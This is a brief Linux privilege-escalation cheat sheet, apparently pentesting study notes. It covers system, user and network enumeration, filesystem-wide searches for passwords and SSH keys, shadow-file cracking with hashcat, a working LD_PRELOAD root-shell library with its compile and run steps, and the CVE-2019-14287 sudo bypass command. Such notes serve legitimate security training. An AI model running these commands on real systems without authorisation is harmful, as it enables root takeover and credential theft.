linux-priv-esc

Linux Privilege-Escalation

Typically you want to become the user with uid=0 aka. root.

initial enumeration

Typically we start with system enumeration

$ hostname
 
# get the distibution name, e.g., debian 2.6.32-5-amd64
$ uname -a 
 
# this included the kernel version
$ cat /proc/version
 
# the issue text might include version information
$ cat /etc/issue
 
# (check services) [|grep root]
$ ps aux 

Another common step is user enumeration

# check command history
$ history
 
# who am i
$ whoami
$ id
 
# can I execute commands as root?
$ sudo -l
 
# search for SUID binaries (also check GTFObins)
$ find / -type f -perm -u=s 2>/dev/null
 
# check for other user accounts
$ cat /etc/passwd
$ ls /home
 
# check for groups
$ cat /etc/group

We should also enumerate networks

# check IP configuration
$ ifconfig -a
$ ip a
 
# routing information
$ route
$ip route
 
# check ARP tables (this is rather weird)
$ arp -a
$ ip neigh
 
# check for network connections
$ netstat -ano

Search for typical locations for passwords:

# search bash history
$ history
$ cat $HOME/.bash_history
 
# check configuration file in $HOME
# check configuration files in /etc
$ grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
$ locate password
 
# search for id_rsa, password files, ec.
$ find . -name "id_rsa"

automated tools

There are many tools that automate those checks

• linpeas
• linenum
• linux-exploit-suggester
• linuxprivchecker.py

exploitation

kernel exploits

• uname -a → google kernel version + exploit
• user the linux-exploit-suggester
• a list of exploits can be found at https://github.com/lucyoa/kernel-exploits

search for weak file permissions

• eg. /etc/passwd and /etc/shadow
• unshadow
• hashcat -m 1800 creds.txt rockyou.txt -O

sudo exploits

• LD_PRELOAD? (in env_keep)

Create new preloaded library with teh following source code:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
 
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

compile and preload it:

$ gcc -fPIC -shared -o $(pwd)/shell.so shell.c -nostartfile
$ sudo LD_PRELOAD=shell.so man

• abuse CVE-2019-14287, !root in sudoers

  • https://www.exploit-db.com/exploits/47502
  • sudo -u#-1 /bin/bash

• sudo buffer overflow

  • Defaults: pwfeedback in sudo -l (you get asterisk instead of nothing when entering a password)

further links

• https://gtfobins.github.io/